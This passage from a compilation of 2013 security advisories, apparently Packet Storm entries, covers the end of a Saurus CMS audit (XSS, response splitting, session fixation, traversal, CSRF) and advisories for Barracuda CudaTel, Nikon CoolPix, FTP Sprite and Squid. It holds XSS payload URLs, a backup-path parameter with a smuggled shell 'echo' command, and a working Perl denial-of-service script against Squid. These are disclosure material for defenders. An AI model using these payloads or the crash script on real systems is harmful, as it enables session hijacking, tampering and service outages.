############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied GET parameter "selected_group" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/file_source.php" line 47: ------------------------[ source code start ]---------------------------------- $callback = (string)$_GET['callback']; .. <?=$callback;?>("<?=str_replace(array('"', "\n", "\r"), array('\"', '\n', '\r'), $fcontent);?>"); ------------------------[ source code end ]------------------------------------ Test (parameter "file" must be valid): http://localhost/saurus471/admin/file_source.php?file=public/test.php&callback=alert(123);// Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 33. Reflected XSS in "admin/change_config.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "flt_keel" and "group" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/change_config.php" line 1220: ------------------------[ source code start ]---------------------------------- <input type=hidden name=flt_keel value="<?=$site->fdat['flt_keel']?>"> .. <input type="hidden" name="group" value="<?=$site->fdat['group']?>"> ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/change_config.php?group=1&flt_keel="><script>alert(123);</script> http://localhost/saurus471/admin/change_config.php?group="><script>alert(123);</script> Result: javascript alert boxes popping up, confirming Reflected XSS vulnerability. ############################################################################### 34. Reflected XSS in "admin/forms.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "form_id" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/forms.php" line 222: ------------------------[ source code start ]---------------------------------- if($site->fdat['op'] == 'delete' && $site->fdat['form_id']) { .. <input type=hidden name=form_id value="<?=$site->fdat['form_id']?>"> ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/forms.php?op=delete&form_id="><script>alert(123);</script> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 35. Reflected XSS in "admin/lang_file.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "flt_keel" and "keel_id" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/lang_file.php" line 204: ------------------------[ source code start ]---------------------------------- $keel_id = isset($site->fdat[flt_keel]) ? $site->fdat[flt_keel] : $site->fdat[keel_id]; .. <input type=hidden name=keel_id value="<?=$keel_id ?>"> ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/lang_file.php?op=import&flt_keel="><script>alert(123);</script> http://localhost/saurus471/admin/lang_file.php?op=import&keel_id="><script>alert(123);</script> Result: javascript alert boxes popping up, confirming Reflected XSS vulnerability. ############################################################################### 36. Reflected XSS in "admin/select_group.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. all user-supplied parameters (excluding "selected_devices") Preconditions: 1. logged in as Saurus CMS admin Php script "admin/select_group.php" line 442: ------------------------[ source code start ]---------------------------------- foreach($site->fdat as $fdat_field=>$fdat_value) { if($fdat_field != 'selected_devices'){ echo '<input type=hidden id="selectform_'.$fdat_field.'" name="'.$fdat_field.'" value="'.$fdat_value.'"> ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/select_group.php?foobar="><script>alert(123);</script> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 37. HTTP Response Splitting and insecure redirection in "redirect.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied GET parameter "url" Preconditions: 1. php version < 4.4.2 or < 5.1.2 Php script "redirect.php" line 100: ------------------------[ source code start ]---------------------------------- if($_GET['url']) { $url = urldecode($_GET['url']); //prevent Response Splitting attack $url = preg_replace("!\r|\n.*!s", "", $url); header('Location: '.$_GET['url']); ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/redirect.php?url=war%0d%0axe Result (using php 5.3.24): Warning: Header may not contain more than a single header, new line detected in C:\apache_www\saurus471\redirect.php on line 106 Test: http://localhost/saurus471/redirect.php?url=http://php.net/ Result: successful redirection ############################################################################### 38. HTTP Response Splitting and insecure redirection in "editor/redirect.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied GET parameter "url" Preconditions: 1. php version < 4.4.2 or < 5.1.2 Php script "editor/redirect.php" line 100: ------------------------[ source code start ]---------------------------------- if($_GET['url']) { $url = urldecode($_GET['url']); //prevent Response Splitting attack $url = preg_replace("!\r|\n.*!s", "", $url); header('Location: '.$_GET['url']); ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/editor/redirect.php?url=war%0d%0axe Result (using php 5.3.24): Warning: Header may not contain more than a single header, new line detected in C:\apache_www\saurus471\editor\redirect.php on line 106 Test: http://localhost/saurus471/editor/redirect.php?url=http://php.net/ Result: successful redirection ############################################################################### 39. HTTP Response Splitting in "idcard/index.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied GET and POST parameters "targeturl" Preconditions: 1. HTTPS connection needed ("SSLRequireSSL" directive in ".htaccess" file) 2. php version < 4.4.2 or < 5.1.2 Php script "idcard/index.php" line 9: ------------------------[ source code start ]---------------------------------- if($_GET['targeturl']) { $targeturl = '?target_url='.$_GET['targeturl']; } elseif($_POST['targeturl']) { $targeturl = '?target_url='.$_POST['targeturl']; } header('Location: ../idcard.php'.$targeturl); ------------------------[ source code end ]------------------------------------ ############################################################################### 40. HTTP Response Splitting in "admin/lang_file.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameters "flt_keel" and "keel_id" Preconditions: 1. php version < 4.4.2 or < 5.1.2 2. logged in as Saurus CMS admin Php script "admin/lang_file.php" line 44: ------------------------[ source code start ]---------------------------------- $keel_id = isset($site->fdat[flt_keel]) ? $site->fdat[flt_keel] : $site->fdat[keel_id]; .. if ($site->fdat['op'] == 'export' && $site->fdat['op2'] == 'salvesta'){ header("Content-Disposition: attachment; filename=\"language".$keel_id.".csv\""); ------------------------[ source code end ]------------------------------------ Tests: http://localhost/saurus471/admin/lang_file.php?op=export&op2=salvesta&flt_keel=%0d%0a http://localhost/saurus471/admin/lang_file.php?op=export&op2=salvesta&keel_id=%0d%0a Result (using php 5.3.24, from errorlog): Header may not contain more than a single header, new line detected ############################################################################### 41. HTTP Response Splitting in "admin/publish.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameter "url" Preconditions: 1. php version < 4.4.2 or < 5.1.2 2. logged in as Saurus CMS user with publish privileges Php script "admin/publish.php" line 118: ------------------------[ source code start ]---------------------------------- header("Location: ".(empty($_SERVER['HTTPS']) ? 'http://' : 'https://').$site->CONF[hostname].$site->fdat[url]); ------------------------[ source code end ]------------------------------------ ############################################################################### 42. HTTP Response Splitting in "add_comment.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameters "tpl", "c_tpl", "id", "redirect_url" Preconditions: 1. php version < 4.4.2 or < 5.1.2 Php script "add_comment.php" line 135: ------------------------[ source code start ]---------------------------------- header('Location: '.urldecode(preg_replace("!\r|\n.*!s", "", $_POST['redirect_url'])).'&lisa_alert=2'); .. header('Location: '.(empty($_SERVER['HTTPS']) ? 'http://': 'https://').$site->CONF['hostname'].$site->CONF['wwwroot']. ($site->in_editor?'/editor':'').'/?'.(($site->fdat['tpl'] || $site->fdat['c_tpl'])&&!$site->fdat['inserted_id']&& !$site->fdat['jump_to_parent']?'tpl='.$site->fdat['tpl']. '&c_tpl='.$site->fdat['c_tpl'].'&':'').'id='.$site->fdat['id'].'&lisa_alert=2'); .. if ($site->fdat['output_device'] == 'pda') { if (strlen($site->fdat['text']) < 2 || strlen($site->fdat['nimi']) < 2) { myRedirect($site->fdat['redirect_url']); .. header("Location: ".urldecode($site->fdat['redirect_url'])); .. function myRedirect($url) { .. header("Location: " . urldecode($url)); } ------------------------[ source code end ]------------------------------------ ############################################################################### 43. Information leakage in "admin/check_requirements.php" ############################################################################### Reason: insufficient access control Test: http://localhost/saurus471/admin/check_requirements.php Result: Simple GET request as shown above reveals some information about web server: MySQL version, Webserver version, PHP version, multiple php setting values, multiple directory permissions. Anyone can access this diagnostic script, no access control exist. ############################################################################### 44. Session Fixation vulnerability in "admin/ajax_response.php" ############################################################################### Attack vector: 1. user-supplied POST parameter "PHPSESSID" Preconditions: none Some years ago PHP session fixation attacks were easy to exploit: just add PHPSESSID=112233445566 to URI and done. Modern PHP versions are more secure by default: PHP setting "session.use_only_cookies" defaults to "1" since 5.3.0, "session.use_trans_sid" defaults to "0". So even if PHP-based web application does have session fixation vulnerability, many real world installations are hard to exploit. Now let's look at Saurus CMS source code. Php script "admin/ajax_response.php" line 27: ------------------------[ source code start ]---------------------------------- if(isset($_POST['PHPSESSID'])) { session_id($_POST['PHPSESSID']); session_start(); } ------------------------[ source code end ]------------------------------------ We can see, that user-submitted POST parameter PHPSESSID is used as argument for PHP function "session_id()", which is followed by "session_start()". It means, that even if "session.use_only_cookies=1" and "session.use_trans_sid=0", session fixation attacks are possible. Test: <html><body><center> <form action="http://localhost/saurus471/admin/ajax_response.php" method="post"> <input type="hidden" name="PHPSESSID" value="1122334455667788"> <input type="submit" value="Test"> </form> </center></body></html> Press "Test button" and then observe server response: HTTP/1.1 200 OK Date: Wed, 05 Jun 2013 10:26:19 GMT Server: Apache/2.2.22 (Win32) DAV/2 mod_ssl/2.2.22 OpenSSL/0.9.8t Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=1122334455667788; path=/ Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/javascript Now log in as Saurus CMS admin and look for session cookies: GET /saurus471/admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: logged=1; PHPSESSID=1122334455667788 Connection: keep-alive We can see, that after authentication session ID does not change, which indicates Session Fixation vulnerability existence. Solution: implement session ID renewal after successful user authentication. ############################################################################### 45. Directory Traversal vulnerability in "admin/ajax_response.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameter "name" Preconditions: 1. logged in as valid Saurus CMS user Result: logged in Saurus CMS user can test existence of arbitrary files on remote server filesystem. Php script "admin/ajax_response.php" line 52: ------------------------[ source code start ]---------------------------------- // check if a file exists if($site->user->user_id && $_REQUEST['op'] == 'check_file' && $site->fdat['name']) { include_once($class_path.'adminpage.inc.php'); $pathinfo = str_replace(array('../', './', '..\\', '.\\'), '', $site->fdat['name']); $pathinfo = explode('/', $pathinfo); $filename = create_alias_from_string($pathinfo[count($pathinfo) - 1],true); unset($pathinfo[count($pathinfo) - 1]); $dirname = implode('/', $pathinfo); if(file_exists($site->absolute_path.$dirname.'/'.$filename)) { echo '{"file_exists": 1}'; } else { echo '{"file_exists": 0}'; } ------------------------[ source code end ]------------------------------------ As seen above, php function "str_replace()" is used for filtering out possible directory traversal substrings. Such filtering is not secure enough and can be bypassed with specially crafted parameter "name". Test 1: http://localhost/saurus471/admin/ajax_response.php?op=check_file&name=..././..././/..././..././/..././..././/foobar.txt Result: {"file_exists": 0} Test 2: http://localhost/saurus471/admin/ajax_response.php?op=check_file&name=..././..././/..././..././/..././..././/test.txt Result: {"file_exists": 1} ############################################################################### 46. Cross-Site Request Forgery in "admin/trash.php" ############################################################################### Reason: 1. missing CSRF token checks Result: 1. Unauthorized deletion of objects from Recycle Bin Php script "admin/trash.php" line 85: ------------------------[ source code start ]---------------------------------- if($site->fdat['delete_all'] && count($site->fdat['objects'])) { //empty trash for($i = count($site->fdat['objects']) - 1; $i >= 0; $i--) { foreach($site->fdat['objects'][$i] as $object_id => $values) if($object_id) { $delete_objs = new Alamlist(array( 'parent' => $object_id, 'klass' => $classes, )); while($object = $delete_objs->next()) { $object->del(); ------------------------[ source code end ]------------------------------------ As seen above, there is no protection against CSRF. Test: http://localhost/saurus471/admin/trash.php?delete_all=1&objects[]=1 Result (from sitelog): "Recycle Bin emptied" Solution: use "verify_form_token()" function in critical places ############################################################################### 47. Cross-Site Request Forgery in "admin/change_config.php" ############################################################################### Reason: 1. missing CSRF token checks Result: 1. Unauthorized modification of site configuration Php script "admin/change_config.php" line 85: ------------------------[ source code start ]---------------------------------- if ($site->fdat[salvesta]==1) { foreach ($site->fdat as $key=>$value) { if ( substr ($key, 0, 4) == "cff_" ) { $sql = $site->db->prepare("UPDATE config SET sisu=? WHERE nimi=?", $value, substr ($key, 4)); $sth = new SQL($sql); ------------------------[ source code end ]------------------------------------ We can see, that there is no protection against CSRF. Tests: http://localhost/saurus471/admin/change_config.php?salvesta=1&cff_save_error_log=0 http://localhost/saurus471/admin/change_config.php?salvesta=1&cff_save_error_log=1 Result: Saurus CMS configuration setting "save_error_log" has been changed Solution: use "verify_form_token()" function in critical places ############################################################################### 48. Cross-Site Request Forgery in "admin/forms.php" ############################################################################### Reason: 1. missing CSRF token checks Result: 1. Unauthorized deletion of forms Php script "admin/forms.php" line 137: ------------------------[ source code start ]---------------------------------- if($site->fdat['op2'] == 'deleteconfirmed' && $site->fdat['form_id']) { # delete form $sql = $site->db->prepare("DELETE FROM forms WHERE form_id=?",$site->fdat['form_id']); $sth = new SQL($sql); ------------------------[ source code end ]------------------------------------ We can see, that there is no protection against CSRF. Test: http://localhost/saurus471/admin/forms.php?op2=deleteconfirmed&form_id=5 Result (from sitelog): "Form 'testform' deleted" Solution: use "verify_form_token()" function in critical places ############################################################################### 49. Full Path Disclosure in multiple scripts ############################################################################### Preconditions: 1. PHP setting "display_errors = On" Tests: http://localhost/saurus471/admin/edit_object.php Fatal error: Call to a member function msg() on a non-object in C:\apache_www\saurus471\admin\edit_object.php on line 1299 http://localhost/saurus471/admin/edit_pilt.php Fatal error: Class 'Timer' not found in C:\apache_www\saurus471\admin\edit_pilt.php on line 21 http://localhost/saurus471/admin/templates.php Fatal error: Call to a member function msg() on a non-object in C:\apache_www\saurus471\admin\templates.php on line 57 Disclosure timeline: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 06.06.2013 -> First email to vendor 06.06.2013 -> First response email from vendor 06.06.2013 -> Sending detailed information to vendor 07.06.2013 -> Vendor started fixing found problems 21.06.2013 -> Found problems are fixed 14.07.2013 -> Current advisory released Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------
  15. Description : Barracuda CudaTel version 2.6.02.040 suffers from a cross site scripting vulnerability. Author : Benjamin Kunz Mejri Source : Barracuda CudaTel 2.6.02.040 Cross Site Scripting ? Packet Storm Code : Title: ====== Barracuda CudaTel 2.6.02.040 - Client Side Cross Site Scripting Vulnerability Date: ===== 2013-07-15 References: =========== http://www.vulnerability-lab.com/get_content.php?id=776 BARRACUDA NETWORK SECURITY ID: BNSEC-807 VL-ID: ===== 776 Common Vulnerability Scoring System: ==================================== 2.1 Introduction: ============= Designed to enable seamless voice and video communication, the CudaTel Communication Server is an easy-to-use, affordable, next-generation phone system for businesses. CudaTel Communication Server s enterprise-class feature set includes Voice over IP (VoIP) PBX services, conferencing, follow-me, automated attendant services, and more, controlled by an easy-to-use Web interface. CudaTel Communication Server is compatible with any SIP device and provider, and can be pre-configured for use with both analog and digital telephone networks. Powerful, Complete Solution With an expansive feature set and and no per user or phone licensing fees, the CudaTel Communication Server is equipped and priced for organizations of any size. Native High Definition audio support and integrated phone line (TDM) hardware produces an unparalleled audio experience. VOIP encryption protects calls from hackers and digital eavesdroppers. (Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx ) Abstract: ========= The Vulnerability Laboratory Research Team discovered a client side web vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application. Report-Timeline: ================ 2012-11-26: Researcher Notification & Coordination 2012-11-27: Vendor Notification 2012-12-01: Vendor Response/Feedback 2013-04-03: Vendor Fix/Patch 2012-07-15: Public Disclosure Status: ======== Published Affected Products: ================== Barracuda Networks Product: CudaTel - Communication Server 2.6.002.040 Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== A client side input validation vulnerability is detected in Barracuda Networks CudaTel v2.6.002.040 appliance application. The non-persistent vulnerability allows remote attackers to manipulate website links to provoke malicious client side (application-side) requests. The secound vulnerability (client side) is located in the `error:Internal Error` exception handling. When remote attackers provoke to load an invalid request the exception-handling will display the earlier inserted bbx_hostname (malicious) web context (exp. script codes). The attacker can use the vulnerable bbx_backup_site_host parameter of the test connection listing module to provoke an evil application exception-handling request. Successful exploitation of the vulnerability results in client side phishing, client side session hijacking and client side external redirects to malware or evil websites. Exploitation of the vulnerability requires medium application user interaction. Vulnerable Section(s): [+] Test - Connection Vulnerable Module(s): [+] Exception-handling [Internal Error] - Listing Vulnerable Parameter(s): [+] bbx_backup_site_host Proof of Concept: ================= The vulnerability can be exploited by remote attackers with low or medium required user interaction and without privileged application user account. For demonstration or reproduce ... Review: Exception-handling [Internal Error] - Listing [bbx_backup_site_host] <pre>--- error: "Internal error.\n[backup] Can't connect to >\"<iframe src="test3-Dateien/a.htm" href="http://vuln-lab.com/?content-type=text/html">http://vuln-lab.com</a>>" </pre></body></html></iframe></pre> PoC: http://cudatel.ptest.cudasvc.com/gui/backup/test ?_=1353975862209&bbx_backup_site_id=2&bbx_backup_site_type=ftp &bbx_backup_site_host=%3E%22%3Ciframe%20src=http://vulnerability-lab.com%3E&bbx_backup_site_port=8&bbx_backup_site_user=BENJAMINKM &bbx_backup_site_path=%2F+%26+echo+%3E+%2Fdata%2Fsounds%2Fmusic%2F8%2F2a10577f-6764-4368-8571-44d42e4695ff Solution: ========= The vulnerability can be patched by parsing the vulnerable bbx_backup_site_host parameter request. Parse the internal error exception-handling when processing to display the error string of the requested parameter. (error context) 2013-04-03: Vendor Fix/Patch Note: Barracuda Networks provided a download in the customer section but also automatic update to patch the issue in the appliance series. Risk: ===== The security risk of the client side input validation vulnerability is estimated as medium(-) because of the main location in the exception-handling. Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
  16. Description : Nikon CoolPix L Series Fw version 1.0 suffers from an information disclosure vulnerability. Author : Benjamin Kunz Mejri Source : Nikon CoolPix L Series Fw 1.0 Information Disclosure ? Packet Storm Code : Title: ====== Nikon CoolPix L Series Fw 1.0 - Information Disclosure Issue Date: ===== 2013-07-16 References: =========== http://www.vulnerability-lab.com/get_content.php?id=1014 VL-ID: ===== 1014 Common Vulnerability Scoring System: ==================================== 3.5 Introduction: ============= Attractive, sturdy and easy to use, the 16-megapixel COOLPIX L27 & 25 is clever with images—so you don’t have to be. Simple controls and smart automatic technology deliver steady images and ensure you capture portraits with smiling faces and open eyes, through the NIKKOR wide-angle 5x optical zoom lens. A large 6.7-cm (2.7-in.) LCD screen displays images with superb clarity at any time of day or night and you can switch to filming the action at the touch of a button, or set the camera to Easy Auto mode and capture photos without worrying about a thing. (Copy of the Vendor Homepage: http://www.europe-nikon.com/en_GB/product/digital-cameras/coolpix/life/coolpix-l27 ) Abstract: ========= The Vulnerability Laboratory Research Team discovered a information disclosure issue in the Nikon CoolPix Digital Camera L25 with Firmware 1.0. Report-Timeline: ================ 2013-07-16: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Nikon Product: COOLPIX L25 L27 & L28 Exploitation-Technique: ======================= Hardware Severity: ========= Medium Details: ======== An information disclosure issue is detected in the official Nikons Camera L Series 25, 28 & maybe others. The information disclosure bug allows remote attackers to access sensitive information of other people, websites, servers or companies. The privacy issue is located in the menu > system module when processing to save a start bild (start picture) when processing to boot the camera system. The camera allows to save a start bild (start picture) and does not remove it when processing to perform a format or firmware reset. People can access the device to watch in the short review of the start bild (start picture) the earlier deleted pictures. The device does not recognize it and stored the pictures without the possibility to delete. In a scenario on eBay we bought from a private seller a nikon camera. He uses the camera about 2 years for his holiday trips and conferences. He recognized in a mail the camera got a format and firmware reset. When the camera arrived at our location we was watching the into short review of the start bild (start picture) and saw several images of the owner. Proof of Concept: ================= The information disclosure issue can be reproduced by local attackers with physical camera device access. Steps to reproduce ... 1. Start the Nikon L series camera 2. Go in the camera screen mode and take a nice picture 3. Go to System > Start Bild 4. Choose your own picture and save it as start picture 5. Now shutdown the camera the regular way and start it again after some secounds 6. The image of us will be visible when the system boots 7. When go to the Menu go to System and format the device 8. Go to Menu again and switch to System 9. After the format we now reset the device 10. Shutdown the Nikon Camera and take out the sd card of course 11. Restart it and go to the menu, open the start bild (start picture) module 12. Now the image of us is visible even but we did a full hardware reset or format 13. Information Disclosure issue in Nikon L Series successful reproduced! Note: When the image is saved in the camera as start picture, no format & no firmware reset can remove it anymore. Solution: ========= To fix the vulnerability remove with the firmware reset or format all pictures from the review menu. Risk: ===== The security risk of the information disclosure issue is estimated as medium(-). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
  17. Description : Squid version 3.3.5 remote denial of service crash exploit. Author : Kingcope Source : Squid 3.3.5 Denial Of Service ? Packet Storm Code : #Squid Crash PoC #Copyright (C) Kingcope 2013 #tested against squid-3.3.5 #this seems to be the patch for the vulnerability: #http://www.squid-cache.org/Versions/v3/3.3/squid-3.3.8.patch #The squid-cache service will respawn, looks like a kind of assert exception: #2013/07/15 20:48:36 kid1| Closing HTTP port 0.0.0.0:3128 #2013/07/15 20:48:36 kid1| storeDirWriteCleanLogs: Starting... #2013/07/15 20:48:36 kid1| Finished. Wrote 0 entries. #2013/07/15 20:48:36 kid1| Took 0.00 seconds ( 0.00 entries/sec). #FATAL: Bungled (null) line 9: snmp_access deny all #Squid Cache (Version 3.2.11): Terminated abnormally. #CPU Usage: 0.020 seconds = 0.012 user + 0.008 sys #Maximum Resident Size: 33312 KB #Page faults with physical i/o: 0 #Memory usage for squid via mallinfo(): # total space in arena: 4100 KB # Ordinary blocks: 4046 KB 7 blks # Small blocks: 0 KB 0 blks # Holding blocks: 564 KB 2 blks # Free Small blocks: 0 KB # Free Ordinary blocks: 53 KB # Total in use: 4610 KB 112% # Total free: 53 KB 1% #2013/07/15 20:48:39 kid1| Starting Squid Cache version 3.2.11 for i686-pc-linux-gnu... #2013/07/15 20:48:39 kid1| Process ID 2990 use IO::Socket; my $sock = IO::Socket::INET->new(PeerAddr => '192.168.27.146', PeerPort => '3128', Proto => 'tcp'); $a = "yc" x 2000; print $sock "HEAD http://yahoo.com/ HTTP/1.1\r\nHost: yahoo.com:$a\r\n\r\n"; while(<$sock>) { print; }
  18. Description : FTP Sprite version 1.2.1 for iOS suffers from a persistent script insertion vulnerability. Author : Benjamin Kunz Mejri Source : FTP Sprite 1.2.1 Script Insertion ? Packet Storm Code : Title: ====== FTP Sprite v1.2.1 iOS - Persistent Web Vulnerability Date: ===== 2013-07-12 References: =========== http://www.vulnerability-lab.com/get_content.php?id=1007 VL-ID: ===== 1007 Common Vulnerability Scoring System: ==================================== 3.7 Introduction: ============= FTP Sprite can turn your iPhone, ipad, ipod into ftp client, download files from ftp server and upload files into ftp server. ** FTP Action ** Add, modify, delete ftp server ** Download multiple files/folder Supported ** Upload multiple files/folder Supported ** Living progress ** View files online ** Create folder online ** Download and upload history ** Sorting by file name, create date and file size ** Local File Sharing ** USB File Sharing via iTunes ** Http File Sharing via WiFi,Support Safari, chrome, firefox and IE6/7/8/9 ** Chrome and Firefox Supported upload multiple files ** Email multiple files/folder Supported ** Open files using other applications ** Local File Manage ** New Folder ** Sorting by file name, create date and file type ** View, copy, move, delete, rename, email, zip Compression and unzip files/folders ** Glide deleting function ** Select all and Cancel all ** Photo import Supported ** Bookmark supported ** File View ** New plain text(default encoding UTF-8),Convert plain file encoding (Unicode,UTF-8 etc) [.txt] ** External file content copy or paste ** Photo View, Zoom [.png .jpg .jpeg .gif .bmp .xbm .tif .tiff etc]; ** Document reader [.pdf .rtf .csv .rtfd .doc .docx .xls .xlsx .ppt .pptx (office 2003 or later) etc] ** Video Player [.mp4] ** File Compression and Decompression [.zip .rar] ** Extract files from encryption .rar ** Multi-touch Supported, Zoom files ** Landscape mode supported ** iPad-compatible (Copy of the Vendor Homepage: https://itunes.apple.com/de/app/ftp-sprite+/id480523641 ) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the FTP Sprite 1.2.1 application (Apple iOS - iPad & iPhone). Report-Timeline: ================ 2013-07-12: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Apple AppStore Product: FTP Sprite - Application 1.2.1 Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== A persistent input validation web vulnerability is detected in the FTP Sprite 1.2.1 application (Apple iOS - iPad & iPhone). The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the app. The vulnerability is located in the index file dir listing module of the web-server (http://localhost:41495) when processing to display via POST request method injected manipulated `folder names`. The persistent script code will be executed in the main index file dir listing module when the service lists the new malicious injected foldername as item. Exploitation of the persistent web vulnerability requires low or medium user interaction without application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation. Vulnerable Application(s): [+] FTP Sprite v1.2.1 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Add Folder Vulnerable Parameter(s): [+] foldername Affected Module(s): [+] Index Folder Listing Proof of Concept: ================= The persistent input validation web vulnerability can be exploited by remote attackers without privilege application user account and with low user interaction. For demonstration or reproduce ... PoC: Add Folder - (Name) <div class="ProgressBar" id="barDiv"> <div id="bar"><span id="barSpan">0%</span></div> </div> </form> </div> <table id="tableContent" border="0" cellpadding="0" cellspacing="0"> <thead> <tr><th><input id="selecteAll" onclick="selectAll(this)" type="checkbox"></th> <th>Name</th><th>Size</th><th>Modified Date</th><th><img src="/download.png" style="border:0;vertical-align:middle;"></th> <th class="del">Delete</th></tr> </thead> <tbody id="filelist"><tr><td><input name="chxItem" value="[PERSISTENT INJECTED SCRIPT CODE!]" onclick="selChkItem(this)" type="checkbox"></td><td><a href="/http%3[PERSISTENT INJECTED SCRIPT CODE!]?guid=E798C174-F7C4-462D-AFC3-12ECC1A36E84& amp;type=child" class="file"><span style="vertical-align:middle;"><img src="/Folder.png" style="border:0;vertical-align:middle;"></span> <iframe src="http:</a"></td><td></td><td>2013-07-11 20:14:33</td><td></td><td><input name="commit" type="button" value="Delete" onclick="DelegateData('/%3Ciframe%20src%3Dhttp%3[PERSISTENT INJECTED SCRIPT CODE!]','E798C174-F7C4-462D-AFC3-12ECC1A36E84');" class='button' /></form></td></tr></tbody></table></iframe></a></td></tr> --- Request Session Log --- Status: 200[OK] POST http://192.168.2.104:41495/?type=createdir&guid=EFB7891B-84ED-4C48-A404-95960BBB95D0 Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Content Size[506] Mime Type[text/plain] Request Headers: Host[192.168.2.104:41495] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0] Accept[text/html, */*; q=0.01] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Requested-With[XMLHttpRequest] Referer[http://192.168.2.104:41495/?guid=EFB7891B-84ED-4C48-A404-95960BBB95D0&type= child&date=Thu%20Jul%2011%202013%2020:05:48%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:06: 26%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:07:33%20GMT+0200] Content-Length[87] Connection[keep-alive] Pragma[no-cache] Cache-Control[no-cache] Post Data: item0[%3Ciframe%20src%3Dhttp%3A%2F%2Fwww.vuln-lab.com%20onload%3Dalert(%22BKM%22)%20%3C] Response Headers: Accept-Ranges[bytes] Content-Length[506] Content-Type[text/plain] Date[Thu, 11 Jul 2013 18:14:33 GMT] 20:08:50.658[40ms][total 40ms] 